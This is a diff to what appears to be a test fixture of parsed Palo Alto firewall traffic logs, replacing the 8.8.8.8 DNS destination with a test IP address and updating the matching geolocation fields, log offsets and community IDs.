@@ -6940,7 +6824,7 @@ "event.end": "2020-03-27T09:57:27.000+01:00", "event.kind": "event", "event.module": "panw", - "event.original": "521 <14>1 2020-03-27T09:57:27+01:00 PA-VM - - - - 1,2020/03/27 09:57:26,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:26,192.168.2.4,8.8.8.8,0.0.0.0,8.8.8.8,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:26,6818,1,35615,53,24414,53,0x400000,udp,allow,98,98,0,1,2020/03/27 09:57:27,0,any,0,2825851,0x0,192.168.0.0-192.168.255.255,United States,0,1,0,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,", + "event.original": "521 <14>1 2020-03-27T09:57:27+01:00 PA-VM - - - - 1,2020/03/27 09:57:26,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:26,192.168.2.4,175.16.199.1,0.0.0.0,175.16.199.1,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:26,6818,1,35615,53,24414,53,0x400000,udp,allow,98,98,0,1,2020/03/27 09:57:27,0,any,0,2825851,0x0,192.168.0.0-192.168.255.255,United States,0,1,0,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,", "event.outcome": "success", "event.start": "2020-03-27T09:57:27.000+01:00", "event.timezone": "+01:00", @@ -6952,12 +6836,12 @@ "fileset.name": "panos", "input.type": "log", "labels.nat_translated": true, - "log.offset": 33632, + "log.offset": 33792, "network.application": "dns", "network.bytes": 98, "network.community_id": [ - "1:E6VJqcuMoS+c2cZlIr8+Bs6VQX0=", - "1:XW3vdS0fzu9SOj7mK2wyCPxwJ0M=" + "1:0bQdeqrtxBjBM+ZRhT64rXdwqs0=", + "1:IetYHlDh9cpB1axIwU2LUlltpp0=" ], "network.direction": "unknown", "network.packets": 1, 
@@ -6974,12 +6858,12 @@ "observer.vendor": "Palo Alto Networks", "panw.panos.action": "allow", "panw.panos.destination.interface": "ethernet1/1", - "panw.panos.destination.nat.ip": "8.8.8.8", + "panw.panos.destination.nat.ip": "175.16.199.1", "panw.panos.destination.nat.port": 53, "panw.panos.destination.zone": "External", "panw.panos.endreason": "n/a", "panw.panos.flow_id": "6818", - "panw.panos.network.nat.community_id": "1:E6VJqcuMoS+c2cZlIr8+Bs6VQX0=", + "panw.panos.network.nat.community_id": "1:IetYHlDh9cpB1axIwU2LUlltpp0=", "panw.panos.ruleset": "Internet Access", "panw.panos.sequence_number": 2825851, "panw.panos.source.interface": "ethernet1/3", @@ -6995,13 +6879,13 @@ ], "related.ip": [ "0.0.0.0", - "192.168.2.4", - "8.8.8.8" + "175.16.199.1", + "192.168.2.4" ], "rule.name": "Internet Access", "server.bytes": 0, - "server.ip": "8.8.8.8", - "server.nat.ip": "8.8.8.8", + "server.ip": "175.16.199.1", + "server.nat.ip": "175.16.199.1", "server.nat.port": 53, "server.packets": 0, "server.port": 53, @@ -7056,7 +6940,7 @@ "input.type": "log", "labels.nat_translated": true, "labels.ssl_decrypted": true, - "log.offset": 34133, + "log.offset": 34303, "network.application": "google-base", "network.bytes": 4605, "network.community_id": [ @@ -7158,7 +7042,7 @@ "fileset.name": "panos", "input.type": "log", "labels.nat_translated": true, - "log.offset": 34676, + "log.offset": 34846, "network.application": "ssl", "network.bytes": 763, "network.community_id": [ @@ -7260,7 +7144,7 @@ "fileset.name": "panos", "input.type": "log", "labels.nat_translated": true, - "log.offset": 35182, + "log.offset": 35352, "network.application": "ssl", "network.bytes": 19474, "network.community_id": [ @@ -7363,7 +7247,7 @@ "input.type": "log", "labels.nat_translated": true, "labels.ssl_decrypted": true, - "log.offset": 35718, + "log.offset": 35888, "network.application": "web-browsing", "network.bytes": 4605, "network.community_id": [ 
@@ -7436,17 +7320,18 @@ "client.nat.port": 52306, "client.packets": 1, "client.port": 56089, - "destination.address": "8.8.8.8", - "destination.as.number": 15169, - "destination.as.organization.name": "Google LLC", + "destination.address": "175.16.199.1", "destination.bytes": 140, - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, - "destination.ip": "8.8.8.8", - "destination.nat.ip": "8.8.8.8", + "destination.geo.city_name": "Changchun", + "destination.geo.continent_name": "Asia", + "destination.geo.country_iso_code": "CN", + "destination.geo.country_name": "China", + "destination.geo.location.lat": 43.88, + "destination.geo.location.lon": 125.3228, + "destination.geo.region_iso_code": "CN-22", + "destination.geo.region_name": "Jilin Sheng", + "destination.ip": "175.16.199.1", + "destination.nat.ip": "175.16.199.1", "destination.nat.port": 53, "destination.packets": 1, "destination.port": 53, 
@@ -7460,7 +7345,7 @@ "event.end": "2020-03-27T09:56:56.000+01:00", "event.kind": "event", "event.module": "panw", - "event.original": "528 <14>1 2020-03-27T09:57:25+01:00 PA-VM - - - - 1,2020/03/27 09:57:25,015351000043722,TRAFFIC,end,2305,2020/03/27 09:57:25,192.168.2.4,8.8.8.8,0.0.0.0,8.8.8.8,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:25,6830,1,56089,53,52306,53,0x400064,udp,allow,248,108,140,2,2020/03/27 09:56:56,0,any,0,2825839,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,", + "event.original": "528 <14>1 2020-03-27T09:57:25+01:00 PA-VM - - - - 1,2020/03/27 09:57:25,015351000043722,TRAFFIC,end,2305,2020/03/27 09:57:25,192.168.2.4,175.16.199.1,0.0.0.0,175.16.199.1,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:25,6830,1,56089,53,52306,53,0x400064,udp,allow,248,108,140,2,2020/03/27 09:56:56,0,any,0,2825839,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,", "event.outcome": "success", "event.start": "2020-03-27T09:56:56.000+01:00", "event.timezone": "+01:00", @@ -7472,12 +7357,12 @@ "fileset.name": "panos", "input.type": "log", "labels.nat_translated": true, - "log.offset": 36239, + "log.offset": 36409, "network.application": "dns", "network.bytes": 248, "network.community_id": [ - "1:/Xjy04gjbQQiz3Dm/r+6kj+GMg0=", - "1:G2ek0+shjHpXaDjxrlNsc5sJLuQ=" + "1:+Bi397gWCvDpubqZgGi15vdsVpU=", + "1:LgeFVvQKO41To+dxyXoHYnibnx4=" ], "network.direction": "unknown", "network.packets": 2, 
@@ -7494,12 +7379,12 @@ "observer.vendor": "Palo Alto Networks", "panw.panos.action": "allow", "panw.panos.destination.interface": "ethernet1/1", - "panw.panos.destination.nat.ip": "8.8.8.8", + "panw.panos.destination.nat.ip": "175.16.199.1", "panw.panos.destination.nat.port": 53, "panw.panos.destination.zone": "External", "panw.panos.endreason": "aged-out", "panw.panos.flow_id": "6830", - "panw.panos.network.nat.community_id": "1:/Xjy04gjbQQiz3Dm/r+6kj+GMg0=", + "panw.panos.network.nat.community_id": "1:+Bi397gWCvDpubqZgGi15vdsVpU=", "panw.panos.ruleset": "Internet Access", "panw.panos.sequence_number": 2825839, "panw.panos.source.interface": "ethernet1/3", @@ -7515,13 +7400,13 @@ ], "related.ip": [ "0.0.0.0", - "192.168.2.4", - "8.8.8.8" + "175.16.199.1", + "192.168.2.4" ], "rule.name": "Internet Access", "server.bytes": 140, - "server.ip": "8.8.8.8", - "server.nat.ip": "8.8.8.8", + "server.ip": "175.16.199.1", + "server.nat.ip": "175.16.199.1", "server.nat.port": 53, "server.packets": 1, "server.port": 53, @@ -7575,7 +7460,7 @@ "fileset.name": "panos", "input.type": "log", "labels.nat_translated": true, - "log.offset": 36747, + "log.offset": 36927, "network.application": "ssl", "network.bytes": 763, "network.community_id": [ @@ -7677,7 +7562,7 @@ "fileset.name": "panos", "input.type": "log", "labels.nat_translated": true, - "log.offset": 37253, + "log.offset": 37433, "network.application": "ssl", "network.bytes": 20666, "network.community_id": [ @@ -7779,7 +7664,7 @@ "fileset.name": "panos", "input.type": "log", "labels.nat_translated": true, - "log.offset": 37789, + "log.offset": 37969, "network.application": "ssl", "network.bytes": 575, "network.community_id": [ 
@@ -7852,17 +7737,18 @@ "client.nat.port": 24891, "client.packets": 1, "client.port": 40729, - "destination.address": "8.8.8.8", - "destination.as.number": 15169, - "destination.as.organization.name": "Google LLC", + "destination.address": "175.16.199.1", "destination.bytes": 0, - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, - "destination.ip": "8.8.8.8", - "destination.nat.ip": "8.8.8.8", + "destination.geo.city_name": "Changchun", + "destination.geo.continent_name": "Asia", + "destination.geo.country_iso_code": "CN", + "destination.geo.country_name": "China", + "destination.geo.location.lat": 43.88, + "destination.geo.location.lon": 125.3228, + "destination.geo.region_iso_code": "CN-22", + "destination.geo.region_name": "Jilin Sheng", + "destination.ip": "175.16.199.1", + "destination.nat.ip": "175.16.199.1", "destination.nat.port": 53, "destination.packets": 0, "destination.port": 53, 
@@ -7876,7 +7762,7 @@ "event.end": "2020-03-27T09:57:23.000+01:00", "event.kind": "event", "event.module": "panw", - "event.original": "521 <14>1 2020-03-27T09:57:22+01:00 PA-VM - - - - 1,2020/03/27 09:57:21,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:21,192.168.2.4,8.8.8.8,0.0.0.0,8.8.8.8,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:21,6907,1,40729,53,24891,53,0x400000,udp,allow,95,95,0,1,2020/03/27 09:57:23,0,any,0,2825832,0x0,192.168.0.0-192.168.255.255,United States,0,1,0,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,", + "event.original": "521 <14>1 2020-03-27T09:57:22+01:00 PA-VM - - - - 1,2020/03/27 09:57:21,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:21,192.168.2.4,175.16.199.1,0.0.0.0,175.16.199.1,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:21,6907,1,40729,53,24891,53,0x400000,udp,allow,95,95,0,1,2020/03/27 09:57:23,0,any,0,2825832,0x0,192.168.0.0-192.168.255.255,United States,0,1,0,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,", "event.outcome": "success", "event.start": "2020-03-27T09:57:23.000+01:00", "event.timezone": "+01:00", @@ -7888,12 +7774,12 @@ "fileset.name": "panos", "input.type": "log", "labels.nat_translated": true, - "log.offset": 38290, + "log.offset": 38470, "network.application": "dns", "network.bytes": 95, "network.community_id": [ - "1:ABhhejR6X5wUGNDEASaULFU4fWg=", - "1:bgNcqcxpiyp3BhNYR4XBMpN3UZE=" + "1:W9qrdyb7I7XUilQIP7w6Hn4kZ08=", + "1:uTeSqnpOPXhWyB2/Nijn3TzVaK8=" ], "network.direction": "unknown", "network.packets": 1, 
@@ -7910,12 +7796,12 @@ "observer.vendor": "Palo Alto Networks", "panw.panos.action": "allow", "panw.panos.destination.interface": "ethernet1/1", - "panw.panos.destination.nat.ip": "8.8.8.8", + "panw.panos.destination.nat.ip": "175.16.199.1", "panw.panos.destination.nat.port": 53, "panw.panos.destination.zone": "External", "panw.panos.endreason": "n/a", "panw.panos.flow_id": "6907", - "panw.panos.network.nat.community_id": "1:bgNcqcxpiyp3BhNYR4XBMpN3UZE=", + "panw.panos.network.nat.community_id": "1:uTeSqnpOPXhWyB2/Nijn3TzVaK8=", "panw.panos.ruleset": "Internet Access", "panw.panos.sequence_number": 2825832, "panw.panos.source.interface": "ethernet1/3", @@ -7931,13 +7817,13 @@ ], "related.ip": [ "0.0.0.0", - "192.168.2.4", - "8.8.8.8" + "175.16.199.1", + "192.168.2.4" ], "rule.name": "Internet Access", "server.bytes": 0, - "server.ip": "8.8.8.8", - "server.nat.ip": "8.8.8.8", + "server.ip": "175.16.199.1", + "server.nat.ip": "175.16.199.1", "server.nat.port": 53, "server.packets": 0, "server.port": 53, @@ -7991,7 +7877,7 @@ "fileset.name": "panos", "input.type": "log", "labels.nat_translated": true, - "log.offset": 38791, + "log.offset": 38981, "network.application": "ssl", "network.bytes": 839, "network.community_id": [ @@ -8093,7 +7979,7 @@ "fileset.name": "panos", "input.type": "log", "labels.nat_translated": true, - "log.offset": 39295, + "log.offset": 39485, "network.application": "ssl", "network.bytes": 839, "network.community_id": [ 
@@ -8166,17 +8052,18 @@ "client.nat.port": 41087, "client.packets": 1, "client.port": 42977, - "destination.address": "8.8.8.8", - "destination.as.number": 15169, - "destination.as.organization.name": "Google LLC", + "destination.address": "175.16.199.1", "destination.bytes": 129, - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, - "destination.ip": "8.8.8.8", - "destination.nat.ip": "8.8.8.8", + "destination.geo.city_name": "Changchun", + "destination.geo.continent_name": "Asia", + "destination.geo.country_iso_code": "CN", + "destination.geo.country_name": "China", + "destination.geo.location.lat": 43.88, + "destination.geo.location.lon": 125.3228, + "destination.geo.region_iso_code": "CN-22", + "destination.geo.region_name": "Jilin Sheng", + "destination.ip": "175.16.199.1", + "destination.nat.ip": "175.16.199.1", "destination.nat.port": 53, "destination.packets": 1, "destination.port": 53, 
@@ -8190,7 +8077,7 @@ "event.end": "2020-03-27T09:56:52.000+01:00", "event.kind": "event", "event.module": "panw", - "event.original": "527 <14>1 2020-03-27T09:57:21+01:00 PA-VM - - - - 1,2020/03/27 09:57:21,015351000043722,TRAFFIC,end,2305,2020/03/27 09:57:21,192.168.2.4,8.8.8.8,0.0.0.0,8.8.8.8,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:21,6374,1,42977,53,41087,53,0x400064,udp,allow,226,97,129,2,2020/03/27 09:56:52,0,any,0,2825827,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,", + "event.original": "527 <14>1 2020-03-27T09:57:21+01:00 PA-VM - - - - 1,2020/03/27 09:57:21,015351000043722,TRAFFIC,end,2305,2020/03/27 09:57:21,192.168.2.4,175.16.199.1,0.0.0.0,175.16.199.1,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:21,6374,1,42977,53,41087,53,0x400064,udp,allow,226,97,129,2,2020/03/27 09:56:52,0,any,0,2825827,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,", "event.outcome": "success", "event.start": "2020-03-27T09:56:52.000+01:00", "event.timezone": "+01:00", @@ -8202,12 +8089,12 @@ "fileset.name": "panos", "input.type": "log", "labels.nat_translated": true, - "log.offset": 39799, + "log.offset": 39989, "network.application": "dns", "network.bytes": 226, "network.community_id": [ - "1:hdoGsOENLr5fK5K8mIuTgIbm2Wg=", - "1:lhAtaXZMkw0gTHgH77EOc4CkxdA=" + "1:+l6gRZRPL6TKmBoxyDraQtnDSJA=", + "1:ww4QTIX+Tbt+EssSliT8ZrYI1ck=" ], "network.direction": "unknown", "network.packets": 2, 
@@ -8224,12 +8111,12 @@ "observer.vendor": "Palo Alto Networks", "panw.panos.action": "allow", "panw.panos.destination.interface": "ethernet1/1", - "panw.panos.destination.nat.ip": "8.8.8.8", + "panw.panos.destination.nat.ip": "175.16.199.1", "panw.panos.destination.nat.port": 53, "panw.panos.destination.zone": "External", "panw.panos.endreason": "aged-out", "panw.panos.flow_id": "6374", - "panw.panos.network.nat.community_id": "1:lhAtaXZMkw0gTHgH77EOc4CkxdA=", + "panw.panos.network.nat.community_id": "1:ww4QTIX+Tbt+EssSliT8ZrYI1ck=", "panw.panos.ruleset": "Internet Access", "panw.panos.sequence_number": 2825827, "panw.panos.source.interface": "ethernet1/3", @@ -8245,13 +8132,13 @@ ], "related.ip": [ "0.0.0.0", - "192.168.2.4", - "8.8.8.8" + "175.16.199.1", + "192.168.2.4" ], "rule.name": "Internet Access", "server.bytes": 129, - "server.ip": "8.8.8.8", - "server.nat.ip": "8.8.8.8", + "server.ip": "175.16.199.1", + "server.nat.ip": "175.16.199.1", "server.nat.port": 53, "server.packets": 1, "server.port": 53, 
@@ -8276,17 +8163,18 @@ "client.nat.port": 5824, "client.packets": 1, "client.port": 52267, - "destination.address": "8.8.8.8", - "destination.as.number": 15169, - "destination.as.organization.name": "Google LLC", + "destination.address": "175.16.199.1", "destination.bytes": 0, - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, - "destination.ip": "8.8.8.8", - "destination.nat.ip": "8.8.8.8", + "destination.geo.city_name": "Changchun", + "destination.geo.continent_name": "Asia", + "destination.geo.country_iso_code": "CN", + "destination.geo.country_name": "China", + "destination.geo.location.lat": 43.88, + "destination.geo.location.lon": 125.3228, + "destination.geo.region_iso_code": "CN-22", + "destination.geo.region_name": "Jilin Sheng", + "destination.ip": "175.16.199.1", + "destination.nat.ip": "175.16.199.1", "destination.nat.port": 53, "destination.packets": 0, "destination.port": 53, 
@@ -8300,7 +8188,7 @@ "event.end": "2020-03-27T09:57:22.000+01:00", "event.kind": "event", "event.module": "panw", - "event.original": "520 <14>1 2020-03-27T09:57:22+01:00 PA-VM - - - - 1,2020/03/27 09:57:21,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:21,192.168.2.4,8.8.8.8,0.0.0.0,8.8.8.8,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:21,6532,1,52267,53,5824,53,0x400000,udp,allow,97,97,0,1,2020/03/27 09:57:22,0,any,0,2825828,0x0,192.168.0.0-192.168.255.255,United States,0,1,0,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,", + "event.original": "520 <14>1 2020-03-27T09:57:22+01:00 PA-VM - - - - 1,2020/03/27 09:57:21,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:21,192.168.2.4,175.16.199.1,0.0.0.0,175.16.199.1,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:21,6532,1,52267,53,5824,53,0x400000,udp,allow,97,97,0,1,2020/03/27 09:57:22,0,any,0,2825828,0x0,192.168.0.0-192.168.255.255,United States,0,1,0,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,", "event.outcome": "success", "event.start": "2020-03-27T09:57:22.000+01:00", "event.timezone": "+01:00", @@ -8312,12 +8200,12 @@ "fileset.name": "panos", "input.type": "log", "labels.nat_translated": true, - "log.offset": 40306, + "log.offset": 40506, "network.application": "dns", "network.bytes": 97, "network.community_id": [ - "1:2UJKDufQ7AqX/DyPKII+SBYkgK0=", - "1:TltHx0JK89MKaBFVWBKuQ2R7fek=" + "1:I60a/y/DT6DffHOeA5irTkk6J/Q=", + "1:VZg3ZyZLl9WZSR2ESTU/o+cNlLU=" ], "network.direction": "unknown", "network.packets": 1, 
@@ -8334,12 +8222,12 @@ "observer.vendor": "Palo Alto Networks", "panw.panos.action": "allow", "panw.panos.destination.interface": "ethernet1/1", - "panw.panos.destination.nat.ip": "8.8.8.8", + "panw.panos.destination.nat.ip": "175.16.199.1", "panw.panos.destination.nat.port": 53, "panw.panos.destination.zone": "External", "panw.panos.endreason": "n/a", "panw.panos.flow_id": "6532", - "panw.panos.network.nat.community_id": "1:TltHx0JK89MKaBFVWBKuQ2R7fek=", + "panw.panos.network.nat.community_id": "1:VZg3ZyZLl9WZSR2ESTU/o+cNlLU=", "panw.panos.ruleset": "Internet Access", "panw.panos.sequence_number": 2825828, "panw.panos.source.interface": "ethernet1/3", @@ -8355,13 +8243,13 @@ ], "related.ip": [ "0.0.0.0", - "192.168.2.4", - "8.8.8.8" + "175.16.199.1", + "192.168.2.4" ], "rule.name": "Internet Access", "server.bytes": 0, - "server.ip": "8.8.8.8", - "server.nat.ip": "8.8.8.8", + "server.ip": "175.16.199.1", + "server.nat.ip": "175.16.199.1", "server.nat.port": 53, "server.packets": 0, "server.port": 53, 
@@ -8386,17 +8274,18 @@ "client.nat.port": 45069, "client.packets": 1, "client.port": 38271, - "destination.address": "8.8.8.8", - "destination.as.number": 15169, - "destination.as.organization.name": "Google LLC", + "destination.address": "175.16.199.1", "destination.bytes": 0, - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, - "destination.ip": "8.8.8.8", - "destination.nat.ip": "8.8.8.8", + "destination.geo.city_name": "Changchun", + "destination.geo.continent_name": "Asia", + "destination.geo.country_iso_code": "CN", + "destination.geo.country_name": "China", + "destination.geo.location.lat": 43.88, + "destination.geo.location.lon": 125.3228, + "destination.geo.region_iso_code": "CN-22", + "destination.geo.region_name": "Jilin Sheng", + "destination.ip": "175.16.199.1", + "destination.nat.ip": "175.16.199.1", "destination.nat.port": 53, "destination.packets": 0, "destination.port": 53, 
@@ -8410,7 +8299,7 @@ "event.end": "2020-03-27T09:57:22.000+01:00", "event.kind": "event", "event.module": "panw", - "event.original": "521 <14>1 2020-03-27T09:57:22+01:00 PA-VM - - - - 1,2020/03/27 09:57:21,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:21,192.168.2.4,8.8.8.8,0.0.0.0,8.8.8.8,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:21,7511,1,38271,53,45069,53,0x400000,udp,allow,98,98,0,1,2020/03/27 09:57:22,0,any,0,2825830,0x0,192.168.0.0-192.168.255.255,United States,0,1,0,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,", + "event.original": "521 <14>1 2020-03-27T09:57:22+01:00 PA-VM - - - - 1,2020/03/27 09:57:21,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:21,192.168.2.4,175.16.199.1,0.0.0.0,175.16.199.1,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:21,7511,1,38271,53,45069,53,0x400000,udp,allow,98,98,0,1,2020/03/27 09:57:22,0,any,0,2825830,0x0,192.168.0.0-192.168.255.255,United States,0,1,0,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,", "event.outcome": "success", "event.start": "2020-03-27T09:57:22.000+01:00", "event.timezone": "+01:00", @@ -8422,12 +8311,12 @@ "fileset.name": "panos", "input.type": "log", "labels.nat_translated": true, - "log.offset": 40806, + "log.offset": 41016, "network.application": "dns", "network.bytes": 98, "network.community_id": [ - "1:oXHCNatSmIbrlcuJWvZAWRTeyNc=", - "1:zdSXmjz/Tji7CoqHzhggI9u9SGo=" + "1:5dxWtJrfqaJx+OBPMj/KPpn8sZM=", + "1:Yb8h28WhmkvCwKoyp/zuEJRCxx8=" ], "network.direction": "unknown", "network.packets": 1, 
@@ -8444,12 +8333,12 @@ "observer.vendor": "Palo Alto Networks", "panw.panos.action": "allow", "panw.panos.destination.interface": "ethernet1/1", - "panw.panos.destination.nat.ip": "8.8.8.8", + "panw.panos.destination.nat.ip": "175.16.199.1", "panw.panos.destination.nat.port": 53, "panw.panos.destination.zone": "External", "panw.panos.endreason": "n/a", "panw.panos.flow_id": "7511", - "panw.panos.network.nat.community_id": "1:oXHCNatSmIbrlcuJWvZAWRTeyNc=", + "panw.panos.network.nat.community_id": "1:5dxWtJrfqaJx+OBPMj/KPpn8sZM=", "panw.panos.ruleset": "Internet Access", "panw.panos.sequence_number": 2825830, "panw.panos.source.interface": "ethernet1/3", @@ -8465,13 +8354,13 @@ ], "related.ip": [ "0.0.0.0", - "192.168.2.4", - "8.8.8.8" + "175.16.199.1", + "192.168.2.4" ], "rule.name": "Internet Access", "server.bytes": 0, - "server.ip": "8.8.8.8", - "server.nat.ip": "8.8.8.8", + "server.ip": "175.16.199.1", + "server.nat.ip": "175.16.199.1", "server.nat.port": 53, "server.packets": 0, "server.port": 53, @@ -8526,7 +8415,7 @@ "input.type": "log", "labels.nat_translated": true, "labels.ssl_decrypted": true, - "log.offset": 41307, + "log.offset": 41527, "network.application": "google-base", "network.bytes": 7129, "network.community_id": [ @@ -8628,7 +8517,7 @@ "fileset.name": "panos", "input.type": "log", "labels.nat_translated": true, - "log.offset": 41855, + "log.offset": 42075, "network.application": "ssl", "network.bytes": 575, "network.community_id": [ @@ -8730,7 +8619,7 @@ "fileset.name": "panos", "input.type": "log", "labels.nat_translated": true, - "log.offset": 42355, + "log.offset": 42575, "network.application": "ssl", "network.bytes": 553, "network.community_id": [ @@ -8832,7 +8721,7 @@ "fileset.name": "panos", "input.type": "log", "labels.nat_translated": true, - "log.offset": 42863, + "log.offset": 43083, "network.application": "paloalto-wildfire-cloud", "network.bytes": 553, "network.community_id": [ 
@@ -8905,17 +8794,18 @@ "client.nat.port": 28322, "client.packets": 1, "client.port": 39926, - "destination.address": "8.8.8.8", - "destination.as.number": 15169, - "destination.as.organization.name": "Google LLC", + "destination.address": "175.16.199.1", "destination.bytes": 0, - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, - "destination.ip": "8.8.8.8", - "destination.nat.ip": "8.8.8.8", + "destination.geo.city_name": "Changchun", + "destination.geo.continent_name": "Asia", + "destination.geo.country_iso_code": "CN", + "destination.geo.country_name": "China", + "destination.geo.location.lat": 43.88, + "destination.geo.location.lon": 125.3228, + "destination.geo.region_iso_code": "CN-22", + "destination.geo.region_name": "Jilin Sheng", + "destination.ip": "175.16.199.1", + "destination.nat.ip": "175.16.199.1", "destination.nat.port": 53, "destination.packets": 0, "destination.port": 53, 
@@ -8929,7 +8819,7 @@ "event.end": "2020-03-27T09:57:21.000+01:00", "event.kind": "event", "event.module": "panw", - "event.original": "524 <14>1 2020-03-27T09:57:21+01:00 PA-VM - - - - 1,2020/03/27 09:57:20,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:20,192.168.2.4,8.8.8.8,0.0.0.0,8.8.8.8,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:20,57869,1,39926,53,28322,53,0x400000,udp,allow,108,108,0,1,2020/03/27 09:57:21,0,any,0,2825820,0x0,192.168.0.0-192.168.255.255,United States,0,1,0,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,", + "event.original": "524 <14>1 2020-03-27T09:57:21+01:00 PA-VM - - - - 1,2020/03/27 09:57:20,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:20,192.168.2.4,175.16.199.1,0.0.0.0,175.16.199.1,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:20,57869,1,39926,53,28322,53,0x400000,udp,allow,108,108,0,1,2020/03/27 09:57:21,0,any,0,2825820,0x0,192.168.0.0-192.168.255.255,United States,0,1,0,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,", "event.outcome": "success", "event.start": "2020-03-27T09:57:21.000+01:00", "event.timezone": "+01:00", @@ -8941,12 +8831,12 @@ "fileset.name": "panos", "input.type": "log", "labels.nat_translated": true, - "log.offset": 43414, + "log.offset": 43634, "network.application": "dns", "network.bytes": 108, "network.community_id": [ - "1:gXS9tqyuBg6/0KzAEU4EdHyNAoI=", - "1:n1xJjm8dA0w4NLBOwk4MphDhs/8=" + "1:PPL6I8dFeEQFMg7LaefQPo4mg7E=", + "1:UCM/4gFTaAMMTF0fpBQjhb2Xqd8=" ], "network.direction": "unknown", "network.packets": 1, 
